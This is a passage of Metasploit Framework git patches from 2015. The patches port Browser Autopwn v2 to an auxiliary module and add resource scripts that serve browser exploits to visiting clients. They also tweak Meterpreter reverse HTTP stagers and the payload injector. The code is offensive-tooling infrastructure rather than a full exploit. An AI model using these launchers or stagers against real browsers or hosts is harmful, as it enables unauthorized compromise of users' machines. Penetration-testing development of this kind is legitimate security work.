     Rex::ThreadFactory.provider = Metasploit::Framework::ThreadFactoryProvider.new(framework: self)
@@ -194,6 +195,12 @@ class Framework
   # into generated payloads.
   #
   attr_reader   :uuid_db
+  #
+  # The framework instance's browser profile store. These profiles are
+  # generated by client-side modules and need to be shared across
+  # different contexts.
+  #
+  attr_reader   :browser_profiles
 
   # The framework instance's db manager. The db manager
   # maintains the database db and handles db events
@@ -251,6 +258,7 @@ protected
   attr_writer   :plugins # :nodoc:
   attr_writer   :db # :nodoc:
   attr_writer   :uuid_db # :nodoc:
+  attr_writer   :browser_profiles # :nodoc:
 end
 
 class FrameworkEventSubscriber

From 6e31b9ef537725af6a78ba14bb2d2b07224851b2 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 2 Jul 2015 15:11:03 -0500
Subject: [PATCH 0644/1013] Initialize and rename the BES mutex

---
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 0f4dfc8025..5791566d65 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -107,6 +107,7 @@ module Msf
       if !custom_404.blank? && custom_404 !~ /^http/i
         raise Msf::OptionValidateError.new(['Custom404 (must begin with http or https)'])
       end
+      @bes_mutex = Mutex.new
       super
     end
 
@@ -146,7 +147,7 @@ module Msf
     #
     # @param block [Proc] Block of code to sync
     def sync(&block)
-      (@mutex ||= Mutex.new).synchronize(&block)
+      @bes_mutex.synchronize(&block)
     end
 
 

From 43d47ad83e7f47e4323055013dd3e344dfcb7e7a Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 2 Jul 2015 15:29:24 -0500
Subject: [PATCH 0645/1013] Port BAPv2 to Auxiliary

---
 .../exploit/remote/browser_exploit_server.rb  | 12 ++++---
 .../server/browser_autopwn2.rb}               | 36 +++++++++----------
 scripts/resource/bap_all.rc                   |  6 ++++
 scripts/resource/bap_dryrun_only.rc           |  4 +--
 scripts/resource/bap_firefox_only.rc          |  4 +--
 scripts/resource/bap_flash_only.rc            |  4 +--
 scripts/resource/bap_ie_only.rc               |  4 +--
 7 files changed, 39 insertions(+), 31 deletions(-)
 rename modules/{exploits/multi/browser/autopwn.rb => auxiliary/server/browser_autopwn2.rb} (85%)
 create mode 100644 scripts/resource/bap_all.rc

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 5791566d65..3c2c70b18b 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -12,6 +12,7 @@ require 'msf/core/exploit/remote/browser_profile_manager'
 #
 # The BrowserExploitServer mixin provides methods to do common tasks seen in modern browser
 # exploitation, and is designed to work against common setups such as on Windows, OSX, and Linux.
+# Note that this mixin is designed to be compatible with both Exploit and Auxilliary modules.
 # Wiki documentations about this mixin can be found here:
 # https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer
 # https://github.com/rapid7/metasploit-framework/wiki/Information-About-Unmet-Browser-Exploit-Requirements
@@ -80,15 +81,15 @@ module Msf
     def initialize(info={})
       super
 
-      # The mixin keeps 'target' so module doesn't lose it.
-      @target = target
+      # The mixin keeps 'target' handy so module doesn't lose it.
+      @target = self.respond_to?(:target) ? target : nil
 
       # Requirements are conditions that the browser must have in order to be exploited.
       @requirements = extract_requirements(self.module_info['BrowserRequirements'] || {})
 
-      @info_receiver_page     = rand_text_alpha(5)
-      @exploit_receiver_page  = rand_text_alpha(6)
-      @noscript_receiver_page = rand_text_alpha(7)
+      @info_receiver_page     = Rex::Text.rand_text_alpha(5)
+      @exploit_receiver_page  = Rex::Text.rand_text_alpha(6)
+      @noscript_receiver_page = Rex::Text.rand_text_alpha(7)
 
       register_options(
       [
@@ -190,6 +191,7 @@ module Msf
     #
     # @param profile [Hash] The profile to check
     def try_set_target(profile)
+      return unless self.respond_to?(:targets)
       match_counts        = []
       target_requirements = {}
       targets.each do |t|
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/auxiliary/server/browser_autopwn2.rb
similarity index 85%
rename from modules/exploits/multi/browser/autopwn.rb
rename to modules/auxiliary/server/browser_autopwn2.rb
index 49113c3ecd..1a09d7f176 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/auxiliary/server/browser_autopwn2.rb
@@ -4,9 +4,7 @@
 ##
 
 require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+class Metasploit3 < Msf::Auxiliary
 
   include Msf::Exploit::Remote::BrowserAutopwnv2
 
@@ -49,16 +47,25 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'License'        => MSF_LICENSE,
       'Author'         => [ 'sinn3r' ],
-      'Targets'        => [ [ 'Automatic', {} ] ],
-      'Platform'       => %w{ java linux osx solaris win android firefox },
-      'Privileged'     => false,
       'DisclosureDate' => "Jul 5 2015",
-      'Targets'        => [ [ 'Automatic', {} ] ],
       'References'     =>
         [
           [ 'URL', 'https://github.com/rapid7/metasploit-framework/wiki' ]
         ],
-      'DefaultTarget'  => 0))
+      'Actions'     =>
+        [
+          [ 'WebServer', {
+            'Description' => 'Start a bunch of modules and direct clients to appropriate exploits'
+          } ],
+        ],
+      'PassiveActions' =>
+        [ 'WebServer' ],
+      'DefaultOptions' => {
+          # We know that most of these exploits will crash the browser, so
+          # set the default to run migrate right away if possible.
+          "InitialAutoRunScript" => "migrate -f",
+        },
+      'DefaultAction'  => 'WebServer'))
 
 
     register_advanced_options(get_advanced_options, self.class)
@@ -77,16 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote
     deregister_options('Retries', 'DisablePayloadHandler', 'ContextInformationFile')
   end
 
-  def setup
-    if datastore['PAYLOAD'] != 'windows/meterpreter/reverse_tcp'
-      msg = "\"set payload\" is disabled: Instead of using \"set payload\", please set PAYLOAD_[platform] "
-      msg << "to set a platform-specific payload, and set PAYLOAD_[platform]_LPORT "
-      msg << "to set a platform-specific LPORT."
-      raise RuntimeError, msg
-    end
-    super
-  end
-
   def get_advanced_options
     opts = []
     DEFAULT_PAYLOADS.each_pair do |platform, payload_info|
@@ -102,5 +99,8 @@ class Metasploit3 < Msf::Exploit::Remote
     send_exploit_html(cli, serve)
   end
 
+  def run
+    exploit
+  end
 
 end
diff --git a/scripts/resource/bap_all.rc b/scripts/resource/bap_all.rc
new file mode 100644
index 0000000000..53b88fc334
--- /dev/null
+++ b/scripts/resource/bap_all.rc
@@ -0,0 +1,6 @@
+<ruby>
+run_single("use auxiliary/server/browser_autopwn2")
+run_single("set RealList true")
+run_single("set VERBOSE true")
+run_single("run")
+</ruby>
diff --git a/scripts/resource/bap_dryrun_only.rc b/scripts/resource/bap_dryrun_only.rc
index 855aca5f4d..8b4d206dde 100644
--- a/scripts/resource/bap_dryrun_only.rc
+++ b/scripts/resource/bap_dryrun_only.rc
@@ -2,7 +2,7 @@
 print_status("Starting BAP...")
 print_status("Exploits will not be actually served, but you will know which ones the clients might be vulnerable to.")
 print_status("You can do 'notes -t baps.clicks' in msfconsole to track clicks and client-specific exploit info.")
-run_single("use exploit/multi/browser/autopwn")
+run_single("use auxiliary/server/browser_autopwn2")
 run_single("set RealList true")
 run_single("set MaxSessions 0")
 
@@ -13,4 +13,4 @@ run_single("set MaxSessions 0")
 run_single("set Content \"Hello, this is a security test. You shouldn't have clicked on that link :-)\"")
 
 run_single("run")
-</ruby>
\ No newline at end of file
+</ruby>
diff --git a/scripts/resource/bap_firefox_only.rc b/scripts/resource/bap_firefox_only.rc
index e33f7813b5..d48f064d73 100644
--- a/scripts/resource/bap_firefox_only.rc
+++ b/scripts/resource/bap_firefox_only.rc
@@ -1,8 +1,8 @@
 <ruby>
 print_status("Starting Browser Autopwn with Firefox-only BrowserExploitServer-based exploits.")
 print_status("Older Firefox exploits don't use BES, therefore will not be loaded.")
-run_single("use exploit/multi/browser/autopwn")
+run_single("use auxiliary/server/browser_autopwn2")
 run_single("set Include (mozilla_firefox|firefox)_")
 run_single("set RealList true")
 run_single("run")
-</ruby>
\ No newline at end of file
+</ruby>
diff --git a/scripts/resource/bap_flash_only.rc b/scripts/resource/bap_flash_only.rc
index 4a764ee960..c7cb25d4d2 100644
--- a/scripts/resource/bap_flash_only.rc
+++ b/scripts/resource/bap_flash_only.rc
@@ -1,8 +1,8 @@
 <ruby>
 print_status("Starting Browser Autopwn with Adobe Flash-only BrowserExploitServer-based exploits.")
 print_status("Older Adobe Flash exploits don't use BES, therefore will not be loaded.")
-run_single("use exploit/multi/browser/autopwn")
+run_single("use auxiliary/server/browser_autopwn2")
 run_single("set Include adobe_flash")
 run_single("set RealList true")
 run_single("run")
-</ruby>
\ No newline at end of file
+</ruby>
diff --git a/scripts/resource/bap_ie_only.rc b/scripts/resource/bap_ie_only.rc
index 935afa0560..56840c5cbd 100644
--- a/scripts/resource/bap_ie_only.rc
+++ b/scripts/resource/bap_ie_only.rc
@@ -1,8 +1,8 @@
 <ruby>
 print_status("Starting Browser Autopwn with IE-only BrowserExploitServer-based exploits.")
 print_status("Older IE exploits don't use BES, therefore will not be loaded.")
-run_single("use exploit/multi/browser/autopwn")
+run_single("use auxiliary/server/browser_autopwn2")
 run_single("set Include (ms\\\\d\\\\d_\\\\d+|ie)_")
 run_single("set RealList true")
 run_single("run")
-</ruby>
\ No newline at end of file
+</ruby>

From 7858d63036481f1053d58ad75387ca028fc1049f Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 2 Jul 2015 15:34:44 -0500
Subject: [PATCH 0646/1013] Typo

---
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 3c2c70b18b..4b7cdffbf0 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -12,7 +12,7 @@ require 'msf/core/exploit/remote/browser_profile_manager'
 #
 # The BrowserExploitServer mixin provides methods to do common tasks seen in modern browser
 # exploitation, and is designed to work against common setups such as on Windows, OSX, and Linux.
-# Note that this mixin is designed to be compatible with both Exploit and Auxilliary modules.
+# Note that this mixin is designed to be compatible with both Exploit and Auxiliary modules.
 # Wiki documentations about this mixin can be found here:
 # https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer
 # https://github.com/rapid7/metasploit-framework/wiki/Information-About-Unmet-Browser-Exploit-Requirements

From 434cffa258a826052a793c8540eb6ea7911b16a3 Mon Sep 17 00:00:00 2001
From: Joshua Smith <kernelsmith@metasploit.com>
Date: Thu, 2 Jul 2015 16:16:57 -0500
Subject: [PATCH 0647/1013] clean up so idiomatic ruby details

---
 lib/msf/ui/console/command_dispatcher/core.rb | 41 +++++++++----------
 .../ui/console/command_dispatcher/core.rb     | 28 ++++++-------
 2 files changed, 31 insertions(+), 38 deletions(-)

diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index b0e7640e08..2733dac365 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -764,7 +764,7 @@ class Core
     print_line "Usage: irb"
     print_line
     print_line "Execute commands in a Ruby environment"
-    print @@irb_opts.usage()
+    print @@irb_opts.usage
   end
 
   #
@@ -778,32 +778,29 @@ class Core
     # Parse the command options
     @@irb_opts.parse(args) do |opt, idx, val|
       case opt
-        when '-e'
-          expressions << val
-        when '-h'
-          cmd_irb_help
-          return false
+      when '-e'
+        expressions << val
+      when '-h'
+        cmd_irb_help
+        return false
       end
     end
 
-    if !expressions.empty?
-      expressions.each do |expression|
-        eval(expression, binding)
+    if expressions.empty?
+      print_status("Starting IRB shell...\n")
+
+      begin
+        Rex::Ui::Text::IrbShell.new(binding).run
+      rescue
+        print_error("Error during IRB: #{$!}\n\n#{$@.join("\n")}")
       end
-      return
-    end
 
-    print_status("Starting IRB shell...\n")
-
-    begin
-      Rex::Ui::Text::IrbShell.new(binding).run
-    rescue
-      print_error("Error during IRB: #{$!}\n\n#{$@.join("\n")}")
-    end
-
-    # Reset tab completion
-    if (driver.input.supports_readline)
-      driver.input.reset_tab_completion
+      # Reset tab completion
+      if (driver.input.supports_readline)
+        driver.input.reset_tab_completion
+      end
+    else
+      expressions.each { |expression| eval(expression, binding) }
     end
   end
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index 9fdb202cf8..6a249212bf 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -330,7 +330,7 @@ class Console::CommandDispatcher::Core
     print_line "Usage: irb"
     print_line
     print_line "Execute commands in a Ruby environment"
-    print @@irb_opts.usage()
+    print @@irb_opts.usage
   end
 
   #
@@ -342,28 +342,24 @@ class Console::CommandDispatcher::Core
     # Parse the command options
     @@irb_opts.parse(args) do |opt, idx, val|
       case opt
-        when '-e'
-          expressions << val
-        when '-h'
-          cmd_irb_help
-          return
+      when '-e'
+        expressions << val
+      when '-h'
+        return cmd_irb_help
       end
     end
 
     session = client
     framework = client.framework
 
-    if !expressions.empty?
-      expressions.each do |expression|
-        eval(expression, binding)
-      end
-      return
+    if expressions.empty?
+      print_status("Starting IRB shell")
+      print_status("The 'client' variable holds the meterpreter client\n")
+
+      Rex::Ui::Text::IrbShell.new(binding).run
+    else
+      expressions.each { |expression| eval(expression, binding) }
     end
-
-    print_status("Starting IRB shell")
-    print_status("The 'client' variable holds the meterpreter client\n")
-
-    Rex::Ui::Text::IrbShell.new(binding).run
   end
 
   @@set_timeouts_opts = Rex::Parser::Arguments.new(

From 5c582b76ca1c821789c24a01a8f014c5655e87ea Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 3 Jul 2015 02:38:52 -0500
Subject: [PATCH 0648/1013] Resolves #4380, check for warbird template

Resolves #4380. Adds a check for warbird (license verification)
windows template. For reference please see:
http://thisissecurity.net/2014/10/15/warbird-operation/
---
 lib/msf/core/exe/segment_injector.rb | 14 ++++++++++++++
 msfvenom                             |  6 +++---
 2 files changed, 17 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exe/segment_injector.rb b/lib/msf/core/exe/segment_injector.rb
index 203785adf6..1b03f24b2b 100644
--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -66,9 +66,23 @@ module Exe
       shellcode.encoded + @payload
     end
 
+    def is_warbird?(pe)
+      pattern = /\x64\xA1\x30\x00\x00\x00\x2B\xCA\xD1\xF9\x8B\x40\x0C\x83\xC0\x0C/
+      sections = {}
+      pe.sections.each {|s| sections[s.name.to_s] = s}
+      if sections['.text'].encoded.pattern_scan(pattern).blank?
+        return false
+      end
+
+      true
+    end
+
     def generate_pe
       # Copy our Template into a new PE
       pe_orig = Metasm::PE.decode_file(template)
+      if is_warbird?(pe_orig)
+        raise RuntimeError, "The template to inject to appears to have license verification (warbird)"
+      end
       pe = pe_orig.mini_copy
 
       # Copy the headers and exports
diff --git a/msfvenom b/msfvenom
index 84b71ab4b9..9697d14c4f 100755
--- a/msfvenom
+++ b/msfvenom
@@ -274,7 +274,7 @@ if __FILE__ == $0
   begin
     generator_opts = parse_args(ARGV)
   rescue MsfVenomError, Msf::OptionValidateError => e
-    $stderr.puts e.message
+    $stderr.puts "Error: #{e.message}"
     exit(-1)
   end
 
@@ -335,7 +335,7 @@ if __FILE__ == $0
     payload = venom_generator.generate_payload
   rescue ::Exception => e
     elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}")
-    $stderr.puts e.message
+    $stderr.puts "Error: #{e.message}"
   end
 
   # No payload generated, no point to go on
@@ -350,7 +350,7 @@ if __FILE__ == $0
     rescue ::Exception => e
       # If I can't save it, then I can't save it. I don't think it matters what error.
       elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}")
-      $stderr.puts e.message
+      $stderr.puts "Error: #{e.message}"
     end
   else
     output_stream = $stdout

From 2b0f6e723d76802f534d82b1ee951a7b00ef304d Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 3 Jul 2015 11:12:59 -0500
Subject: [PATCH 0649/1013] Explain the byte sequence

---
 lib/msf/core/exe/segment_injector.rb | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/lib/msf/core/exe/segment_injector.rb b/lib/msf/core/exe/segment_injector.rb
index 1b03f24b2b..11ca89853a 100644
--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -67,6 +67,12 @@ module Exe
     end
 
     def is_warbird?(pe)
+      # The byte sequence is for the following code pattern:
+      # .text:004136B4                 mov     eax, large fs:30h
+      # .text:004136BA                 sub     ecx, edx
+      # .text:004136BC                 sar     ecx, 1
+      # .text:004136BE                 mov     eax, [eax+0Ch]
+      # .text:004136C1                 add     eax, 0Ch
       pattern = /\x64\xA1\x30\x00\x00\x00\x2B\xCA\xD1\xF9\x8B\x40\x0C\x83\xC0\x0C/
       sections = {}
       pe.sections.each {|s| sections[s.name.to_s] = s}

From 29d45e3b189734941432f0e801740e185e8a54cf Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Fri, 3 Jul 2015 14:12:29 -0400
Subject: [PATCH 0650/1013] Pymet patch in timeout info on generate_stage

---
 lib/msf/core/handler/reverse_http.rb          |  5 -----
 modules/payloads/stages/python/meterpreter.rb | 11 ++++++++---
 2 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 762cad028b..e4cde0528e 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -287,11 +287,6 @@ protected
           blob.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
         end
 
-        blob.sub!('SESSION_EXPIRATION_TIMEOUT = 604800', "SESSION_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
-        blob.sub!('SESSION_COMMUNICATION_TIMEOUT = 300', "SESSION_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
-        blob.sub!('SESSION_RETRY_TOTAL = 3600', "SESSION_RETRY_TOTAL = #{datastore['SessionRetryTotal']}")
-        blob.sub!('SESSION_RETRY_WAIT = 10', "SESSION_RETRY_WAIT = #{datastore['SessionRetryWait']}")
-
         resp.body = blob
 
         # Short-circuit the payload's handle_connection processing for create_session
diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb
index 597eb7233e..3cbd9e7a52 100644
--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -22,14 +22,14 @@ module Metasploit3
       'Session'       => Msf::Sessions::Meterpreter_Python_Python
     ))
     register_advanced_options([
-      OptBool.new('PythonMeterpreterDebug', [ true, "Enable debugging for the Python meterpreter", false ])
+      OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ])
     ], self.class)
   end
 
   def generate_stage(opts={})
-    file = ::File.join(Msf::Config.data_directory, "meterpreter", "meterpreter.py")
+    file = ::File.join(Msf::Config.data_directory, 'meterpreter', 'meterpreter.py')
 
-    met = ::File.open(file, "rb") {|f|
+    met = ::File.open(file, 'rb') {|f|
       f.read(f.stat.size)
     }
 
@@ -37,6 +37,11 @@ module Metasploit3
       met = met.sub("DEBUGGING = False", "DEBUGGING = True")
     end
 
+    met.sub!('SESSION_EXPIRATION_TIMEOUT = 604800', "SESSION_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
+    met.sub!('SESSION_COMMUNICATION_TIMEOUT = 300', "SESSION_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
+    met.sub!('SESSION_RETRY_TOTAL = 3600', "SESSION_RETRY_TOTAL = #{datastore['SessionRetryTotal']}")
+    met.sub!('SESSION_RETRY_WAIT = 10', "SESSION_RETRY_WAIT = #{datastore['SessionRetryWait']}")
+
     uuid = opts[:uuid] || generate_payload_uuid
     bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
     met = met.sub("PAYLOAD_UUID = \"\"", "PAYLOAD_UUID = \"#{bytes}\"")

From fb2da00bfdf48166c84efba763413c26ca8733a4 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 4 Jul 2015 09:27:18 -0700
Subject: [PATCH 0651/1013] Fix #5662 by not generating a small uri by default

---
 lib/msf/core/payload/uuid/options.rb         | 2 +-
 lib/msf/core/payload/windows/reverse_http.rb | 6 ++++--
 2 files changed, 5 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/payload/uuid/options.rb b/lib/msf/core/payload/uuid/options.rb
index f20233d031..52f749e0be 100644
--- a/lib/msf/core/payload/uuid/options.rb
+++ b/lib/msf/core/payload/uuid/options.rb
@@ -36,7 +36,7 @@ module Msf::Payload::UUID::Options
     # The URI length may not have room for an embedded UUID
     if len && len < URI_CHECKSUM_UUID_MIN_LEN
       # Throw an error if the user set a seed, but there is no room for it
-      if datastore['PayloadUUIDSeed'].to_s.length > 0 ||datastore['PayloadUUIDRaw'].to_s.length > 0
+      if datastore['PayloadUUIDSeed'].to_s.length > 0 || datastore['PayloadUUIDRaw'].to_s.length > 0
         raise ArgumentError, "A PayloadUUIDSeed or PayloadUUIDRaw value was specified, but this payload doesn't have enough room for a UUID"
       end
       return "/" + generate_uri_checksum(sum, len, prefix="")
diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb
index f6c3e32657..884cca248a 100644
--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -46,13 +46,12 @@ module Payload::Windows::ReverseHttp
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'],
       port:        datastore['LPORT'],
-      url:         generate_small_uri,
       retry_count: datastore['StagerRetryCount']
     }
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]        = generate_uri
+      
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']
@@ -60,6 +59,9 @@ module Payload::Windows::ReverseHttp
       conf[:proxy_user] = datastore['PayloadProxyUser']
       conf[:proxy_pass] = datastore['PayloadProxyPass']
       conf[:proxy_type] = datastore['PayloadProxyType']
+    else
+    # Otherwise default to small URIs
+      conf[:url]        = generate_small_uri
     end
 
     generate_reverse_http(conf)

From 3c7298ba80a2283162e1601fdc41e54b90508af8 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 4 Jul 2015 12:38:04 -0500
Subject: [PATCH 0652/1013] Fix additional copy-pasta cases of #5662

---
 lib/msf/core/payload/windows/reverse_http.rb        | 2 +-
 lib/msf/core/payload/windows/reverse_winhttp.rb     | 4 +++-
 lib/msf/core/payload/windows/x64/reverse_http.rb    | 4 +++-
 lib/msf/core/payload/windows/x64/reverse_winhttp.rb | 4 +++-
 4 files changed, 10 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb
index 884cca248a..bd82f32e09 100644
--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -51,7 +51,7 @@ module Payload::Windows::ReverseHttp
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      
+
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']
diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb
index bfd9d130fe..b4a88ebbae 100644
--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -27,7 +27,6 @@ module Payload::Windows::ReverseWinHttp
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'],
       port:        datastore['LPORT'],
-      url:         generate_small_uri,
       retry_count: datastore['StagerRetryCount']
     }
 
@@ -42,6 +41,9 @@ module Payload::Windows::ReverseWinHttp
       conf[:proxy_pass]       = datastore['PayloadProxyPass']
       conf[:proxy_type]       = datastore['PayloadProxyType']
       conf[:retry_count]      = datastore['StagerRetryCount']
+    else
+    # Otherwise default to small URIs
+      conf[:url]              = generate_small_uri
     end
 
     generate_reverse_winhttp(conf)
diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb
index a8f62b36da..9f168c1da6 100644
--- a/lib/msf/core/payload/windows/x64/reverse_http.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http.rb
@@ -50,7 +50,6 @@ module Payload::Windows::ReverseHttp_x64
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'],
       port:        datastore['LPORT'],
-      url:         generate_small_uri,
       retry_count: datastore['StagerRetryCount']
     }
 
@@ -64,6 +63,9 @@ module Payload::Windows::ReverseHttp_x64
       conf[:proxy_user] = datastore['PayloadProxyUser']
       conf[:proxy_pass] = datastore['PayloadProxyPass']
       conf[:proxy_type] = datastore['PayloadProxyType']
+     else
+    # Otherwise default to small URIs
+      conf[:url]        = generate_small_uri
     end
 
     generate_reverse_http(conf)
diff --git a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
index 9fe09ac40f..b43fdb3ee8 100644
--- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
@@ -24,7 +24,6 @@ module Payload::Windows::ReverseWinHttp_x64
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'],
       port:        datastore['LPORT'],
-      url:         generate_small_uri,
       retry_count: datastore['StagerRetryCount']
     }
 
@@ -38,6 +37,9 @@ module Payload::Windows::ReverseWinHttp_x64
       conf[:proxy_user]       = datastore['PayloadProxyUser']
       conf[:proxy_pass]       = datastore['PayloadProxyPass']
       conf[:proxy_type]       = datastore['PayloadProxyType']
+    else
+    # Otherwise default to small URIs
+      conf[:url]              = generate_small_uri
     end
 
     generate_reverse_winhttp(conf)

From aaaf6807edd1453165dbe9fae127aedf88d10de9 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Sun, 5 Jul 2015 09:16:17 +1000
Subject: [PATCH 0653/1013] Minor indentation/space fixes

---
 lib/msf/core/payload/windows/reverse_http.rb        | 3 +--
 lib/msf/core/payload/windows/reverse_winhttp.rb     | 2 +-
 lib/msf/core/payload/windows/x64/reverse_http.rb    | 2 +-
 lib/msf/core/payload/windows/x64/reverse_winhttp.rb | 2 +-
 4 files changed, 4 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb
index bd82f32e09..f29662d6fa 100644
--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -51,7 +51,6 @@ module Payload::Windows::ReverseHttp
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']
@@ -60,7 +59,7 @@ module Payload::Windows::ReverseHttp
       conf[:proxy_pass] = datastore['PayloadProxyPass']
       conf[:proxy_type] = datastore['PayloadProxyType']
     else
-    # Otherwise default to small URIs
+      # Otherwise default to small URIs
       conf[:url]        = generate_small_uri
     end
 
diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb
index b4a88ebbae..3d88f787c1 100644
--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -42,7 +42,7 @@ module Payload::Windows::ReverseWinHttp
       conf[:proxy_type]       = datastore['PayloadProxyType']
       conf[:retry_count]      = datastore['StagerRetryCount']
     else
-    # Otherwise default to small URIs
+      # Otherwise default to small URIs
       conf[:url]              = generate_small_uri
     end
 
diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb
index 9f168c1da6..1813b9922b 100644
--- a/lib/msf/core/payload/windows/x64/reverse_http.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http.rb
@@ -64,7 +64,7 @@ module Payload::Windows::ReverseHttp_x64
       conf[:proxy_pass] = datastore['PayloadProxyPass']
       conf[:proxy_type] = datastore['PayloadProxyType']
      else
-    # Otherwise default to small URIs
+      # Otherwise default to small URIs
       conf[:url]        = generate_small_uri
     end
 
